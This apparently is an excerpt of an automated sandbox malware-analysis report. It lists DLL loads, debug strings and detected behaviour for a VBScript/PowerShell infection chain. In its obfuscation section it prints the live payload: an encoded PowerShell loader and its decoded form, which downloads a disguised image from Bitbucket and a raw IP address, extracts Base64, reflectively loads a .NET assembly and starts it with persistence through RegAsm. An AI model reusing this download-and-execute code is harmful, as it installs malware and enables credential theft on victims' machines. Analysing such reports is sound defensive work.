        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\where.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: where.pdbGCTL source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: where.pdb source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WKOyCvoOlM.exe, 00000007.00000002.3403075765.00000000000BE000.00000002.00000001.01000000.00000007.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3403074648.00000000000BE000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb4 source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244534059.00000127CEBE0000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$", "0")
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og